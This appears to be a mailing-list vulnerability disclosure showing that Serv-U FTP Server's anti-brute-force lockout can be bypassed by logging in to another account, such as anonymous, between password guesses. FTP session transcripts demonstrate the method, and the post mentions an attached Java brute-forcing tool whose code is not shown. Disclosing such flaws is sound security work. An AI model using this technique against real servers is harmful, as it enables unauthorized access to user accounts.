Brute Forcing FTP Servers with enabled anti-hammering (anti brute-force) modus

[Craig <Craig () FREENET DE>]

Brute Forcing FTP Servers with enabled anti-hammering (ant brute-force) modus
-----------------------------------------------------------------------------

While playing around with Serv-U FTP Server, I found out that it is
possible to bypass it's hammering protection which should protect accounts
from being brute-forced. In the following text I will explain this step by
step.


A user logs into an ftp server like this:

USER USERNAME
PASS PASSWORD

When the user entered an invalid password for 3 times he will be
disconnected and is not allowed to connect again for a specified time - so
far so good, but i wondered what happened if I tried another users account
in order to try 3 passwords for every user per connection (lines with the
prefix ">" are from the server) :

USER USER1
> 331 User name okay, need password.
PASS PASSWORD
> 530 Not logged in.

USER USER1
> 331 User name okay, need password.
PASS nextpassPASSWORD
> 530 Not logged in.

USER USER2
> 331 User name okay, need password.
PASS anotherPASSWORD
> 530 Not logged in.

I was disconnected, and already about to give up when I noticed that anonymous
login was enabled:

USER USER1
> 331 User name okay, need password.
PASS PASSWORD
> 530 Not logged in.

USER USER1
> 331 User name okay, need password.
PASS nextpassPASSWORD
> 530 Not logged in.

USER anonymous
> 331 User name okay, please send complete E-mail address as password.
PASS somemail () address com
> 230 User logged in, proceed.

USER USERNAME
> 331 User name okay, need password.
PASS 3rdPASSWORD
> 530 Not logged in.

USER USERNAME
> 331 User name okay, need password.
PASS 4thPASSWORD
> 530 Not logged in.

...
...

BINGO! That worked!

This does not only work with anonymous access, you just need to log into an
account and then you can retry to log into the user's account!

I coded a little program in java to automate the brute forcing process
which reads the passwords from a wordlist. In my local network it tested
about 100 passwords per minute - that is not very fast, but it only uses
one connection and as far as i know it's the only tool that bypasses the
anti brute-force function...

Brutus-aet2 (with 10 connections, 10ms timeout, disabled anti-hammering of
course) made 20 tries per second - my program is only single-threaded, but
if its method was implented into brutus-aet3 it might be the fastest ftp
brute-force tool ever :)


- Craig

Craig () Freenet de
http://www.HaQuarter.De (only German yet)
Download Brutus at http://www.hobbie.net/brutus

P.S.:Before writing this, I did a quick search at securityfocus, but i did
not find anything about this issue, if this was already known i am sorry
for wasting your time!

Attachment: newftpbrute.java
Description: